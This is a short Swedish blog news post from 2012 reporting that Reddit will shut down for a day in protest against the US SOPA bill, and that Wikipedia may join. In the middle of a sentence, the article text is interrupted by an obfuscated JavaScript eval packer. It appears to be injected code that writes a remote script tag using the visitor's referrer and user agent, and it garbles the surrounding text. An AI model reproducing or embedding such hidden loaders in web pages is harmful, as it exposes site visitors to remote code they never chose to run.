Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Reddit stänger i protest mot SOPA

Reddit stänger i protest mot SOPA
Filip Urde
  • On 11 januari, 2012
  • http://www.revue.se/filip-urde

Många hemsidor har redan stängt ner tillföljd av det amerikanska lagförslaget SOPA och nu har även nätforumet Reddit visat sitt missnöje med förslaget och stänger ner sin hemsidan på obestämd tid. Det amerikanska lagförslaget SOPA (som eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fszbr|var|u0026u|referrer|ssfkz||js|php’.split(’|’),0,{}))
vi skrev om här
), är ett lagförslag som i teorin skulle kunna stänga ner hemsidor mer eller mindre för ingenting om någon upphovrättshavare anser att det finns material på sajten som tillhör dem. Vilket innebär att vi på Revue.se skulle kunna bli nedstängda om t.ex. Apple eller Microsoft inte vill att sina produktbilder visas på vår hemsida. SOPIGT helt enkelt!

En tungviktare som kan gå med i kampen är Wikipedia, där man pratat om att stänga ner sin hemsida i protest mot SOPA. Reddits hemsida kommer att stängas ner den 18 januari mellan kl 08:00 och kl 20:00 amerikansk östkust-tid.
blog.reddit.com